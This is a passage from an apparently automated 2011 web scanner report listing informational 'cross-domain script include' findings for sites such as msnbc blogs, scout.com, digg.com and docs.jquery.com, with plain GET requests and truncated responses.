User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:51:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b765ed910b57120efaf7c192ef14af0a; expires=Sat, 25-Jan-2031 17:51:08 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 88050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.35. http://cartoonblog.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cartoonblog.msnbc.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET / HTTP/1.1
Host: cartoonblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.36. http://cartoonblog.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cartoonblog.msnbc.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET / HTTP/1.1
Host: cartoonblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.37. http://channel9.msdn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://channel9.msdn.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.4.min.js

Request

GET / HTTP/1.1
Host: channel9.msdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:11 GMT
Connection: close
Content-Length: 81079

<!doctype html>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <meta name="robots" content="index,follow"/>
   <title>Channel 9: Videos about the people buildi
...[SNIP]...
<![endif]-->

       <script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

23.38. http://college.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://college.scout.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

GET / HTTP/1.1
Host: college.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 69563

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>College Team Directory Front Page</title>
<meta http
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.39. http://collegebasketball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://collegebasketball.scout.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

GET / HTTP/1.1
Host: collegebasketball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:54 GMT
Last-Modified: Sun, 30 Jan 2011 02:06:12 GMT
ETag: "1CBC02244730200"
Content-Type: text/html
Content-Length: 43257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.40. http://collegefootball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://collegefootball.scout.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

GET / HTTP/1.1
Host: collegefootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:55 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:55 GMT
Last-Modified: Sun, 30 Jan 2011 02:05:21 GMT
ETag: "1CBC022260D0680"
Content-Type: text/html
Content-Length: 43460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.41. http://content.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.scout.com
Path:	/a.z

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 02:07:57 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:57 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.42. http://cosmiclog.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cosmiclog.msnbc.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/1798a98b07d2f6f3a7134b6460ddafd5a8d8b7ba.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET / HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.43. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cosmiclog.msnbc.redacted
Path:	/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/be62a51c8122dbfe2873a3381fba7856187fe888.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

Response

23.44. http://curmudgeons.blogspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://curmudgeons.blogspot.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.assoc-amazon.com/s/asw.js
http://www.blogger.com/static/v1/common/js/755007736-csitail.js
http://www.statcounter.com/counter/counter_xhtml.js

Request

GET / HTTP/1.1
Host: curmudgeons.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sun, 30 Jan 2011 02:07:57 GMT
Date: Sun, 30 Jan 2011 02:07:57 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Sat, 29 Jan 2011 22:50:38 GMT
ETag: "3769e370-63c6-4a98-8a60-8feefd5f390b"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Curmudgeons Corner</title>
<style>
body {background:#666666;margin: 0px;font-family: Verdana, Arial, sans-se
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.assoc-amazon.com/s/asw.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/755007736-csitail.js"></script>
...[SNIP]...

23.45. http://dating.redacted/cp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/cp.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/scripts/jquery.pngFix.js

Request

Response

23.46. http://dating.redacted/en-us/partner/msn/38028.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/en-us/partner/msn/38028.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/scripts/jquery.pngFix.js

Request

GET /en-us/partner/msn/38028.html HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:58 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=1d011f98-ba73-4855-b224-c4cf627b237b; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=58b22e78-d897-4147-94de-7181130c66ec&THEME=84; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52342

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

23.47. http://dating.redacted/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/scripts/jquery.shuffle.js

Request

GET /index.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.48. http://dating.redacted/search/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/search/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js

Request

GET /search/index.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.49. http://digg.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/App_Search/index.754d0683.js
http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js
http://cdn2.diggstatic.com/js/lib.b29284a6.js
http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:21:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24569 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7917

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/lib.b29284a6.js" type="text/javascript"></script>
<script src="http://cdn1.diggstatic.com/js/App_Search/index.754d0683.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

23.50. http://docs.jquery.com/Plugins/Validation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/Plugins/Validation

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /Plugins/Validation HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:11 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 08 Dec 2010 11:37:59 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.51. http://docs.jquery.com/UI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:11 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 15:56:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.52. http://docs.jquery.com/UI/Effects/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:14 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.53. http://docs.jquery.com/UI/Effects/Blind previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Blind

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Blind HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:14 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.54. http://docs.jquery.com/UI/Tabs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Tabs

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Tabs HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:14 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Fri, 10 Dec 2010 17:57:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.55. http://earthsky.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://earthsky.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js?ver=2.9.2
http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: earthsky.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 02:08:12 GMT
X-Pingback: http://earthsky.org/xmlrpc.php
Connection: close
